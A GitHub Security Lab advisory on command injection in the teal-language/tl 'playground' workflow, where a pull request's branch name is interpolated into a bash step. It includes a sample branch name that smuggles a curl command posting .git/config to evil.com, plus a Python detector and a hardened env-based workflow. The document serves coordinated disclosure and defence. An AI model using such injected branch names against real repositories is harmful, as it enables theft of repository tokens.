February 3, 2021

GHSL-2021-017: Command injection in teal-language/tl workflow

Jaroslav Lobačevski

Coordinated Disclosure Timeline

  • 2021-01-18: Report sent to maintainers.
  • 2021-01-18: Issue resolved.

Summary

The playground GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.

Product

teal-language/tl repository

Tested Version

The latest changeset of playground.yml to date.

Details

Issue: A branch name from the pull request is used to format a shell command

on:
  pull_request_target:
    branches: [ master ]
...
    - name: build
      run: |
        echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
        cd ${{ github.workspace }}/teal-playground
        yarn build

Impact

This vulnerability allows arbitrary command injection into the bash script, which in turn allows unauthorized modification of the base repository and secrets exfiltration. For example, a PR from a branch named a";${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}# would exfiltrate the repository token to the attacker-controlled server.
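An added example, not code from the advisory or from the teal-language/tl project: a standard-library Python check that flags pull-request-controlled expressions inside run scripts, applied to the step shown under Details and to a constructed rewrite that passes the same values through env. The expression list, the function name find_injectable_runs and the rewritten step are assumptions of this example, not the maintainers' fix.

```python
import re
# Expressions a pull-request author controls (short list chosen for this example).
UNTRUSTED = re.compile(r"\$\{\{\s*github\.(?:head_ref|event\.pull_request\."
                       r"(?:head\.ref|head\.label|title|body))\s*\}\}")
RUN_KEY = re.compile(r"^\s*(?:-\s+)?run:\s*(.*)$")

def find_injectable_runs(workflow_text):
    """Return (line_number, expression) for untrusted expressions inside run scripts."""
    findings = []
    block_indent = None  # indent of the `run:` line while inside its block scalar
    for number, line in enumerate(workflow_text.splitlines(), start=1):
        indent = len(line) - len(line.lstrip())
        if block_indent is not None:
            if not line.strip() or indent > block_indent:
                findings += [(number, m.group(0)) for m in UNTRUSTED.finditer(line)]
                continue
            block_indent = None  # dedent: the script has ended
        match = RUN_KEY.match(line)
        if match:
            script = match.group(1)
            if script[:1] in ("|", ">"):
                block_indent = indent  # multi-line script follows
            else:
                findings += [(number, m.group(0)) for m in UNTRUSTED.finditer(script)]
    return findings

# Step from the advisory: the expression is pasted into the script before bash parses it.
VULNERABLE = '''\
    - name: build
      run: |
        echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
        cd ${{ github.workspace }}/teal-playground
        yarn build
'''

# Constructed rewrite (an assumption, not the maintainers' fix): values reach the
# script as quoted environment variables, expanded as data, not re-parsed as syntax.
HARDENED = '''\
    - name: build
      env:
        HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
        HEAD_REF: ${{ github.head_ref }}
      run: |
        echo "$HEAD_REPO/$HEAD_REF"
        cd "$GITHUB_WORKSPACE/teal-playground"
        yarn build
'''

print(find_injectable_runs(VULNERABLE), find_injectable_runs(HARDENED))
```

The check is line-based and only inspects run scripts, so the same expression under env is not reported.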

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2021-017 in any communication regarding this issue.